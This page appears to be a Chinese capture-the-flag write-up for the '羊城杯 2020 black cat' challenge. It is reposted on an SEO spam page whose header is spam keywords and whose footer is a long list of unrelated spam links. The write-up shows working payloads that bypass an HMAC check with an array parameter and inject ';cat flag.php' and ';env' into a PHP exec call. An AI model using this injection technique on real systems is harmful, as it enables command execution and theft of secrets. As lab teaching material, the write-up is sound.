当前位置: 首页 > news >正文

阜阳做网站公司google搜索优化

阜阳做网站公司,google搜索优化,网站制作的知识,网站上传限制[羊城杯 2020]black cat 1 解题流程1.1 第一步1.2 第二步1.3 第三步 1 解题流程 1.1 第一步 打开网站有首歌,按F12也是提示听歌,ctf-wscan扫描就flag.php下载歌,用010打开,发现有一段内容if(empty($_POST[Black-Cat-Sheriff]) |…

[羊城杯 2020]black cat

  • 1 解题流程
    • 1.1 第一步
    • 1.2 第二步
    • 1.3 第三步

1

1 解题流程

1.1 第一步

  1. 打开网站有首歌,按F12也是提示听歌,ctf-wscan扫描就flag.php
  2. 下载歌,用010打开,发现有一段内容
    if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){die('Ë­£¡¾¹¸Ò²ÈÎÒÒ»Ö»¶úµÄβ°Í£¡');
    }
    $clandestine = getenv("clandestine");		//获取环境变量
    if(isset($_POST['White-cat-monitor']))$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
    $hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
    if($hh !== $_POST['Black-Cat-Sheriff']){die('ÓÐÒâÃé×¼£¬ÎÞÒâ»÷·¢£¬ÄãµÄÃÎÏë¾ÍÊÇÄãÒªÃé×¼µÄÄ¿±ê¡£ÏàÐÅ×Ô¼º£¬Äã¾ÍÊÇÄÇ¿ÅÉäÖаÐÐĵÄ×Óµ¯¡£');
    }
    echo exec("nc".$_POST['One-ear']);
    

1.2 第二步

  1. 这题要post这几个参数:Black-Cat-Sheriff、One-ear、White-cat-monitor
    这里有3个if,首先第一个肯定绕过;
          第二个if里面存在hash_hmac函数,只要我们传数组就能让盐是空,即第一次加密的clandestine是空
          第三个因为盐是空所以只有普通加密,Black-Cat-Sheriff传对应加密结果就行
    特性:MD5、sha特性是无法识别数组,只要是数组加密,就会变成null,所以White-cat-monitor采用数组绕过
  2. 最后一个if判断,编写一个脚本,生成加密结果
    <?php$hh = hash_hmac('sha256',';cat flag.php', null);echo $hh;
    ?>
    结果:04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6
    
  3. exec(‘nc’.) 这里拼接命令,如果直接传cat flag.php会变成 => exec('nc’cat flag.php)无法执行
    只要是系统命令的执行,可以通过;来拼接命令,所以one-ear=;cat flag.php => exec('nc';cat flag.php)

1.3 第三步

我先用ls ls …/ ls /等都没结果,考虑其他

  1. ?Black-Cat-Sheriff=83a52f8ff4e399417109312e0539c80147b5514586c45a6caeb3681ad9c1a395&One-ear=;dir&White-cat-monitor[]=1
    得到: Hei_Mao_Jing_Chang.mp3 flag.php index.php js scss
  2. Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat flag.php&White-cat-monitor[]=1
    得到: “GWHT{y0u_mu3t_p@y_atTentiou_!0_lt}”;
    提交后发现这个flag是错的
  3. 如果cat flag.php没出来,就cat /flag,或者env
    Black-Cat-Sheriff=afd556602cf62addfe4132a81b2d62b9db1b6719f83e16cce13f51960f56791b&One-ear=;env&White-cat-monitor[]=1
    得到:FLAG=flag{e325e53c-76d2-40b8-a41a-4dd88185afdb}
http://www.15wanjia.com/news/20625.html

相关文章:

  • 横岗网站建设百度推广下载安装
  • flash同视频做网站免费推广的方式有哪些
  • 大连精美网站制作优量汇广告平台
  • 英文网站做翻译接单百度做广告多少钱
  • 大型网站建设平台海外网站建站
  • 2014 湖南个人网站备案可以做b2b吗站长工具ip地址查询
  • 怎样查看网站的权重谷歌搜索优化
  • 淄博网站制作公司托管网站关键词优化有用吗
  • 宝安网站设计哪家好seo搜索引擎优化排名报价
  • 做苗木免费网站求个没封的网站2022
  • 专业网站开发技术百度seo关键词报价
  • php 禁止电脑访问网站正规app推广
  • 陕西的建设厅官方网站京东seo搜索优化
  • 广州建设交易中心网站首页搜什么关键词你都懂的
  • 网站建设公司如何收费广安网站seo
  • 一个企业网站做几个关键词营销技巧和话术
  • 做网站客户要提供什么日本免费服务器ip地址
  • 供应链网站制作2023年7月最新新闻摘抄
  • 综合性b2b电子商务平台郑州seo顾问外包公司
  • 织梦移动网站后缀搜索引擎优化大致包含哪些内容或环节
  • 北京十大代理记账公司南宁seo规则
  • 化妆品网站制作网络营销推广主要做什么
  • 高端全屋定制十大名牌排行榜seo关键词排名优化推荐
  • 南京商城网站建设新手怎么做网络推广
  • 卧龙区网站制作恩施seo整站优化哪家好
  • 重庆网站制作一般需要多少钱网站群发软件
  • 部门网站建设注意事项市场调研分析报告范文
  • 移动端的网站怎么做网络推广求职招聘交流群
  • seo 刷网站url市场调研报告范文3000字
  • 最好wordpress积分付费插件企业网站排名优化